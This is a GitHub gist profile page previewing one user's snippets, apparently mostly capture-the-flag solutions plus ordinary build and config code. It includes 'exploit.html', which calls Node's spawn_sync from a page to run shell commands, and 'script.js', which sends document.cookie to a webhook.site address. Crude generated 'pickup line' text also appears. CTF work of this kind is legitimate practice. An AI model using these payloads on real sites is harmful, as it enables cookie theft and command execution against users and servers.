Skip to content

Instantly share code, notes, and snippets.

View c0nrad's full-sized avatar

Stuart Larsen c0nrad

View GitHub Profile
@c0nrad
c0nrad / solve.py
Created November 26, 2023 18:43
GlacierCTF 2023 rev/password-recovery
import angr
from IPython import embed
import logging
import claripy
logging.getLogger('angr').setLevel('WARN')
for i in range(11, 56):
print(i)
@c0nrad
c0nrad / exploit.html
Created September 25, 2023 13:29
web/optimized-admin-bot vsCTF 2023
<!DOCTYPE html>
<html>
<script>
let process = window._globalObject.constructor.constructor("return process")();
let spawn_sync = process.binding("spawn_sync");
normalizeSpawnArguments = function (c, b, a) {
if ((Array.isArray(b) ? (b = b.slice(0)) : ((a = b), (b = [])), a === undefined && (a = {}), (a = Object.assign({}, a)), a.shell)) {
const g = [c].concat(b).join(" ");
typeof a.shell === "string" ? (c = a.shell) : (c = "/bin/sh"), (b = ["-c", g]);
@c0nrad
c0nrad / script.js
Created October 26, 2022 13:29
script.js
var videoelement = document.createElement("video");
videoelement.setAttribute("id", "video1");
var sourceMP4 = document.createElement("source");
sourceMP4.type = "video/mp4";
sourceMP4.src = "https://webhook.site/b0ac5293-b48e-4831-a5d6-eebedb5869bf/b.png?data=" + encodeURI(document.cookie);
videoelement.appendChild(sourceMP4);
document.body.appendChild(videoelement);
wget https://github.com/webmproject/libwebp/archive/v1.1.0.tar.gz -O /tmp/libwebp-v1.1.0.tar.gz
tar -C /tmp -zxvf /tmp/libwebp-v1.1.0.tar.gz
mkdir -p /tmp/libwebp-1.1.0/make
cd /tmp/libwebp-1.1.0 && \
cmake -DWEBP_ENABLE_SIMD=ON -DWEBP_BUILD_CWEBP=ON -DWEBP_BUILD_DWEBP=ON -DWEBP_BUILD_GIF2WEBP=ON -DWEBP_BUILD_IMG2WEBP=ON -DWEBP_BUILD_WEBPINFO=ON -DWEBP_NEAR_LOSSLESS=ON ../ \
make && make install
$host = http.getHostHeader();
if ( $host == "coverity.10gen.com" || $host == "coverity.mongodb.com" ) {
http.changeSite( "https://coverity.corp.mongodb.com/" );
}
if ( $host == "coverity.corp.mongodb.com" ) {
if ( !ssl.isSSL() ) {
http.changeSite( "https://coverity.corp.mongodb.com/" );
}
package main
import (
"fmt"
"net/http"
"github.com/gorilla/websocket"
)
type Message struct {
class Lol:
pass
lol = Lol()
functions = ["print_hai", "print_bai", "print_meow", "print_lulz"]
for func in functions:
printValue = func.split('_')[1] # hai, bai, meow
setattr(lol, func, lambda printValue=printValue: print(printValue))
lol.print_hai()
@c0nrad
c0nrad / gist:9901654612628b75cfc8
Created November 14, 2014 13:54
Sylvia Pickup Lines
I taught Sylvia pickup lines...
➜ love git:(master) ✗ ./love
I I apologize? Wanna fuck like peanut
butter, wanna go halves on a bastard?
Do I wanna go halves on a
killer...want to sleep with me? Your legs
must be skin and we'll talk about
the hair between your peaches, wanna shake
your left leg was ten.

Keybase proof

I hereby claim:

  • I am c0nrad on github.
  • I am c0nrad (https://keybase.io/c0nrad) on keybase.
  • I have a public key whose fingerprint is B158 1A57 70AF 7D55 B3A0 DF0E 1033 FE9E 3C78 F5F1

To claim this, I am signing this object: